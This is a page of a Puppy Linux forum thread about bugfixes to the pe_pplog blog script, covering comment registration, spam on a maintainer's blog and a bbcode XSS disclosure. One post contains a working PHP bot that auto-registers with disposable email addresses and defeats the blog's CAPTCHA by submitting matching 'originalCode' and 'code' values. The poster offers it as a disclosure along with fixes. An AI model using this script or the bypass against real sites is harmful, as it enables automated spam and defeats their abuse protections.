Puppy Linux Discussion Forum Forum Index Puppy Linux Discussion Forum
Puppy HOME page : puppylinux.com
"THE" alternative forum : puppylinux.info
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

The time now is Fri 28 Nov 2014, 22:20
All times are UTC - 4
 Forum index » Advanced Topics » Additional Software (PETs, n' stuff) » Browsers and Internet
pe_pplog v2.1b bufixes!
Post new topic   Reply to topic View previous topic :: View next topic
Page 5 of 5 [70 Posts]   Goto page: Previous 1, 2, 3, 4, 5
Author Message
efiabruni

Joined: 18 Oct 2011
Posts: 68

PostPosted: Wed 04 Dec 2013, 14:55    Post subject: true  

will do that once I'm back from travelling

until then, all the other bugfixes and featured I described are in v2.1b.

I also put the blog up on github (username: efiabruni) feel free to play around Smile I'll be camping in Patagonia Very Happy
Back to top
View user's profile Send private message 
efiabruni

Joined: 18 Oct 2011
Posts: 68

PostPosted: Tue 10 Dec 2013, 08:57    Post subject: changes on github  

The last four days I spent on a ferry and had time to play with the pplog
I made following changes in the pe_pplog on github:

Added comment preview option for the admin page
Added the preview comment button on the preview comment page (now comment can be previewed again and again and again)
Added a check for double posts of comments

Changed files are: Pe_pplog.pl; pe_admin.pl and pe_Config.pl
Back to top
View user's profile Send private message 
BarryK
Puppy Master


Joined: 09 May 2005
Posts: 7084
Location: Perth, Western Australia

PostPosted: Fri 13 Dec 2013, 10:59    Post subject:  

efia,
I would appreciate your suggestions about what I should do.

I have been forced to disable comments on my blog, as someone has persisted in posting pornography comments.

I have been deleting them, but the person is persisting in posting more.

I was wondering how difficult it would be to implement email verification to register to post.

One way it could work, is when a user wants to post a comment, they first have to click a "Register" link. They provide their email address, to which their desired username and password are sent.

A log can be kept of usernames and email addresses, and the banning system can be expanded to ban users based on their email address.

Perhaps there are other ways of doing it.

_________________
http://bkhome.org/news/
Back to top
View user's profile Send private message Visit poster's website 
anikin

Joined: 10 May 2012
Posts: 529

PostPosted: Fri 13 Dec 2013, 12:15    Post subject:  

Barry wrote:
Due to the moron named "Author", I have been forced to disable comments

That moron has many names: 'mafur', 'simargl13', 'simargl29' etc., He posted spam and pron on this forum too. Looks like he has a severe mental pathology and needs urgent medical attention.
Back to top
View user's profile Send private message 
efiabruni

Joined: 18 Oct 2011
Posts: 68

PostPosted: Fri 13 Dec 2013, 22:20    Post subject:  

Some people are depressingly destructive. I'm on holiday at the moment, but will look into it once I'm home. If someone has ideas, feel free to fork the blog on github!
Back to top
View user's profile Send private message 
efiabruni

Joined: 18 Oct 2011
Posts: 68

PostPosted: Sun 15 Dec 2013, 15:33    Post subject: branching out  

I created a branch called comment_registration on github.
In this I changed the pe_pplog.pl file to:
not accept comments from not registered users
send a new mail with registration request to the admin if a new user tries to post

The admin has to manually edit the useres.ppl.data file. The syntax is: username'encrypted password"username2'encrypted password2"...

This is a quick&ugly fix
Back to top
View user's profile Send private message 
efiabruni

Joined: 18 Oct 2011
Posts: 68

PostPosted: Mon 27 Jan 2014, 05:29    Post subject: comment registration  

I have updated the branch commen_registration on https://github.com/efiabruni/pe_pplog to make it possible for users to register and for the admin to block users.

I could not test it thoroughly as i don't have sendmail or similar. I use a simple regEx for email validation, this is not the most secure way to use sendmail, please use with care.

This will not be part of the official pe_pplog
Back to top
View user's profile Send private message 
gungsukma

Joined: 18 Sep 2011
Posts: 17

PostPosted: Fri 07 Feb 2014, 00:30    Post subject:  

Code:
I am bot   Posted on 7 Feb 2014, 12:09 by x6255
Barry should use REAL CAPTCHA.


I'm the one posted that on http://bkhome.org/news/?viewDetailed=00055

This is the script I have used (I used PHP, but it will be easy to be converted to other language).

Code:
<?php
set_time_limit(100);

// Random username
$random = 'x'.rand(1000, 9999);
echo "Your username: $random<br/>";

// Make email adress
file_get_contents("http://opentrashbox.org/mailbox.php?email=$random");
echo "Your email: $random@opentrashbox.org<br/>";

// Register to Barry's blog, Wait for email
file_get_contents("http://bkhome.org/news/?do=register&username=$random&email=$random@opentrashbox.org&originalCode=AAAAAAAA&code=AAAAAAAA&process=register&Submit=Register");
sleep(30);

// Read inbox, Get the password
$contents = file_get_contents("http://opentrashbox.org/mailbox.php?email=$random");
preg_match("/password:\s*(\d+)/", $contents, $match);
$password = $match[1];
echo "Your password: $password<br/>";

// Add comment
file_get_contents("http://bkhome.org/news/?viewDetailed=00055&title=I+am+bot&author=$random&content=Barry+should+use+REAL+CAPTCHA.&originalCode=9999999&code=9999999&pass=$password&postTitle=Comments+are+back&sendComment=00055&Submit=Add+Comment");
echo "Barry should use *real captcha*.<br/>";


With that script, I can make and register random username and random email address. Someone blocks one, I'll make one (thanks, OpenTrashBox.org!).

But the one thing I want to show is the Security Code, you can trick it!
On the script, I don't even bother to read the security code, I just need to change the value of form element originalCode and code, then I can bypass the security code. These parts:
> originalCode=AAAAAAAA&code=AAAAAAAA
> originalCode=9999999&code=9999999

This is my suggestion:
- Just accept email register from GMail.com and Yahoo.com or any reputable email service
- Check the pattern of username of email address, just accept alphanumeric, dots, and underscore.
- For GMail, remove all dots and label in the email username (gungsukma@gmail.com, g.ung.suk.ma@gmail.com, gungsukma+bla.bla@gmail.com are all the same user).
- Use REAL CAPTCHA when register and add comment
- Disable the comment on the blog now, I have leaked the bot source code. Twisted Evil

Oh, "gungsukma@gmail.com" is not mine
Back to top
View user's profile Send private message 
efiabruni

Joined: 18 Oct 2011
Posts: 68

PostPosted: Wed 12 Feb 2014, 16:45    Post subject: re: bots  

I am aware that the captcha is suboptimal, therefore there is also the "security question" option, which does not suffer from the same vulnerability and could even be set as a password.

Changes to comment_registration:
added disposable email services to block list by default
stricter rules for email validation

comment registration is never going to be an official feature, if someone feels like playing around with it, the code is on github on the branch comment_registration.
I simply do not have enough interest in this particular problem to muck around with it. I rather create galleries and css animations and stuff Smile

Again, the easiest and safest way is to use the security question as a password and only give the answer to people you trust. If it is broken into, change it.

Also, before someone got a personal grudge and went out of his way to post spam, no bot got past the former security features of the pplog for the past 2 years that I have been using it, nor was it a problem for Barry until now.
Back to top
View user's profile Send private message 
efiabruni

Joined: 18 Oct 2011
Posts: 68

PostPosted: Tue 01 Apr 2014, 05:18    Post subject: security issue  

There is a security issue with having bbcode enabled in comments in all the pplogs (original, SJPPlog and this one)

Due to very admissive parsing of the bbcode it is possible to insert javascript in comments when posting a link or a picture.
See http://tine.pagekite.me/pe_pplog.pl/?viewDetailed=00047 for an example. This makes comments vulnerable to xss attacks.

My advise is to disable bbcode on the comments of ALL versions of the PPLOG

What is needed:
URL / SRC validating and escaping
strict rules for which attributes are allowed, validating and escaping
additional html escaping

I will fix this properly in the coming weeks
Back to top
View user's profile Send private message 
Display posts from previous:   Sort by:   
Page 5 of 5 [70 Posts]   Goto page: Previous 1, 2, 3, 4, 5
Post new topic   Reply to topic View previous topic :: View next topic
 Forum index » Advanced Topics » Additional Software (PETs, n' stuff) » Browsers and Internet
Jump to:  

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group
[ Time: 0.0821s ][ Queries: 13 (0.0112s) ][ GZIP on ]